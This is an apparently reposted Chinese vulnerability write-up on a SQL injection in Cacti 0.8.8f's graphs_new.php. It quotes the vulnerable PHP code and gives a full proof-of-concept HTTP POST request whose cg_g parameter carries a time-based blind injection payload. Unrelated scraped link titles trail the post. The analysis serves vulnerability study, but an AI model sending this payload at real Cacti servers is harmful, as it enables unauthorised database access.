Cacti是一套网络流量监测图形分析工具。它有非常强大的数据和用户管理功能,可以指定每一个用户能查看树状结 构、host以及任何一张图,还可以与LDAP结合进行用户验证,同时也能自己增加模板,功能非常强大。

graphs_new.phpfunction form_save() {

if (isset($_POST["save_component_graph"])) {

/* summarize the 'create graph from host template/snmp index' stuff into an array */

while (list($var, $val) = each($_POST)) {

if (preg_match('/^cg_(\d+)$/', $var, $matches)) {

$selected_graphs["cg"]{$matches[1]}{$matches[1]} = true;

//cg_g is not filtered

}elseif (preg_match('/^cg_g$/', $var)) {

if ($_POST["cg_g"] > 0) {

$selected_graphs["cg"]{$_POST["cg_g"]}{$_POST["cg_g"]} = true; //给数组赋值

}

}elseif (preg_match('/^sg_(\d+)_([a-f0-9]{32})$/', $var, $matches)) {

$selected_graphs["sg"]{$matches[1]}{$_POST{"sgg_" . $matches[1]}}{$matches[2]} = true;

}

}

if (isset($selected_graphs)) {

host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);//调用漏洞函数

exit;

}

header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);

}

if (isset($_POST["save_component_new_graphs"])) {

host_new_graphs_save();

header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);

}

}

function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {

/* we use object buffering on this page to allow redirection to another page if no

fields are actually drawn */

ob_start();

include_once("./include/top_header.php");

print "

\n";

$snmp_query_id = 0;

$num_output_fields = array();

while (list($form_type, $form_array) = each($selected_graphs_array)) {//便利数组

while (list($form_id1, $form_array2) = each($form_array)) {//继续便利数组,将数组中的key提取出来作为form_id1,form_id2

if ($form_type == "cg") {

$graph_template_id = $form_id1; //赋值

//sql injection in graph_template_id

html_start_box("Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "3", "center", "");//带入查询

}elseif ($form_type == "sg") {

while (list($form_id2, $form_array3) = each($form_array2)) {

/* ================= input validation ================= */

input_validate_input_number($snmp_query_id);

/* ==================================================== */

$snmp_query_id = $form_id1;

$snmp_query_graph_id = $form_id2;

POCPOST /cacti/graphs_new.php HTTP/1.1

Host: 192.168.217.133

Content-Type: application/x-www-form-urlencoded

Cookie: 1c4af7f2e90e3a789e67a8e3acd2372f=8a83va6ijomgf7qdgfpcl8l1p2; Cacti=j8chtc1ppq4n7viqkbah6c4tv2

Content-Length: 189

__csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save

cacti graphs new.php,Cacti 0.8.8f graphs_new.php SQL注入漏洞相关推荐

  1. 本地复现Zabbix v2.2.x, 3.0.0-3.0.3 jsrpc 参数 profileIdx2 SQL 注入漏洞

    靶场地址:http://192.168.253.131:8000/ poc打包后台上传 转载于:https://www.cnblogs.com/Expioit/p/9036725.html

  2. 动网 php v1.0 漏洞,动网论坛dispuser.php页面SQL注入漏洞

    受影响系统: 动网论坛 Dvbbs php 2.0++ 描述: DVBBS是一款Aspsky.Net开发和维护的开放源码ASP Web论坛程序. 在DVBBS的dispuser.php文件中: if( ...

  3. 【代码审计】iCMS_v7.0.7 admincp.app.php页面存在SQL注入漏洞分析

      0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/downloa ...

  4. 【代码审计】iCMS_v7.0.7 apps.admincp.php页面存在SQL注入漏洞分析

      0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/downloa ...

  5. 【代码审计】iCMS_v7.0.7 search.admincp.php页面存在SQL注入漏洞

      0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/downloa ...

  6. 【代码审计】iCMS_v7.0.7 keywords.admincp.php页面存在SQL注入漏洞分析

      0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/downloa ...

  7. php100漏洞,phpyun人才管理系统V5.0 SQL注入漏洞分析

    *世界上最愚蠢的事莫过于我们无比狂热地做一件事,到最后却不知道为什么要做* cms背景介绍 PHP云人才管理系统(phpyun)是国内主流人才管理CMS系统之一!PHP云专为中文用户设计和开发,采用: ...

  8. guestbook.php注入,Destoon 6.0 guestbook.php 通用SQL注入漏洞

    作者:phithon 补丁分析 1.jpg (15.43 KB, 下载次数: 107) 2017-1-17 09:52 上传 刚看到今天发布了Destoon 6.0 2017-01-09 更新,用我在 ...

  9. WeiPHP5.0 SQL注入漏洞1

    本博客已搬迁至:https://n0puple.github.io/ 此处不再更新文章 本文仅用于技术讨论与研究,文中的实现方法切勿应用在任何违法场景.如因涉嫌违法造成的一切不良影响,本文作者概不负责 ...

最新文章

  1. SP-45ML光电二极管放大电路及其动态特性
  2. Prism框架研究(一)
  3. 计算机配置选项在哪,电脑启动项目设置在哪
  4. javacv 写mp4_JavaCV实现获取视频每帧并保存
  5. php cgi进程很多win2008,php cgi.exe 太多 在 windowserver2008 apache 这个怎么样限制下?...
  6. C# Json 序列化与反序列化一
  7. 跳坑成功,手摸手带你使用PHP连接Oracle数据库
  8. java 文档比较功能_Java 12 新特性介绍,快来补一补
  9. jenkins2 pipeline高级
  10. stm32固件库下载地址
  11. 游戏服务器开发技术栈
  12. 给zabbix更换nagios图标
  13. 什么是MIMO(多输入多输出),以及MIMO的分类和测试(一)
  14. 蓝桥杯 算法训练 ALGO-114 黑白无常
  15. 雾霾太大看不清?这里有份数据支持你一键去雾
  16. Hacking Vim: 插件管理器Pathogen(02)
  17. 海蜘蛛软路由linux安装教程,软路由安装设置教程【详细步骤】-太平洋IT百科
  18. salesforce与微信集成(一)-- 如何配置微信和salesforce
  19. 微信小程序计算时间差
  20. Linux请求调页技术,linux零页技术.doc

热门文章

  1. 递归算法:兔子繁殖问题详解
  2. Ubuntu系统下U盘设备的读取
  3. html5编写商品购买网页,HTML5 弹出式窗口的商品购买页卡片模板
  4. 电视盒子什么牌子好?2023热门电视盒子排行榜
  5. 微软发布全新的编程语言Bosque
  6. 西电捷通: Windows LWF驱动如何兼容TISec客户端
  7. 这家公司为了让员工玩游戏还专门写了一个小程序
  8. Unity+C#开发笔记(七)| unity中继承MonoBehaviour类的脚本里的函数怎么调用 | ╭(●`∀´●)╯╰(●’◡’●)╮
  9. 采用模块化建模方法,搭建空气悬架模型,UKF状态估计模型,可实现悬架动挠度等状态估计
  10. 4.确定性推理方法: 自然演绎推理, 归结演绎推理, 鲁滨逊归结原理,归结反演